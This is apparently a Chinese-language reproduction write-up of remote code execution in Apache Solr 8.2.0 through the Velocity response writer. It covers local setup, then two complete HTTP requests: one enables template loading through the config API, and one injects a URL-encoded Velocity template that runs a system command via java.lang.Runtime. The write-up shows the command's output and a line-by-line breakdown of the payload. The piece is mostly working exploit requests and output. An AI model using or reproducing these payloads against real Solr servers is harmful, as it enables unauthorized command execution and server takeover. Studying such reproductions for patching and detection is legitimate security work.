参考链接：

https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

https://lucene.apache.org/solr/guide/8_2/config-api.html

https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

 0x01 环境配置

C:\solr-8.2.0\bin
λ solr.cmd start -p 8983
Java HotSpot(TM) 64-Bit Server VM warning: JVM cannot use large page memory because it does not have enough privilege to lock pages in memory.
Unable to get Charset 'cp65001' for property 'sun.stderr.encoding', using default GBK and continuing. Waiting up to 30 to see Solr running on port 8983
Started Solr server on port 8983. Happy searching!

C:\solr-8.2.0\bin
λ solr.cmd create -c test111
WARNING: Using _default configset with data driven schema functionality. NOT RECOMMENDED for production use.
To turn off: bin\solr config -c test111 -p 8983 -action set-user-property -property update.autoCreateFields -value false
Unable to get Charset 'cp65001' for property 'sun.stderr.encoding', using default GBK and continuing.

Created new core 'test111'

C:\solr-8.2.0\bin

 

 0x02 测试payload

 

发送第一个请求

POST /solr/test111/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}

 

HTTP/1.1 200 OK
Content-Type: text/plain;charset=utf-8
Content-Length: 150

{
"responseHeader":{
"status":0,
"QTime":9574},
"WARNING":"This response format is experimental. It is likely to change in the future."}

 

发送第二个请求

GET /solr/test111/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983

 

HTTP/1.1 200 OK

Content-Type: text/html;charset=utf-8
Content-Length: 58

0 uid=197608(lzhd24) gid=197121 groups=197121

 

 0x03 payload分析

#set($x='') 
#set($rt=$x.class.forName('java.lang.Runtime')) 
#set($chr=$x.class.forName('java.lang.Character')) 
#set($str=$x.class.forName('java.lang.String')) 
#set($ex=$rt.getRuntime().exec('id'))+$ex.waitFor() 
#set($out=$ex.getInputStream()) 
#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))
#end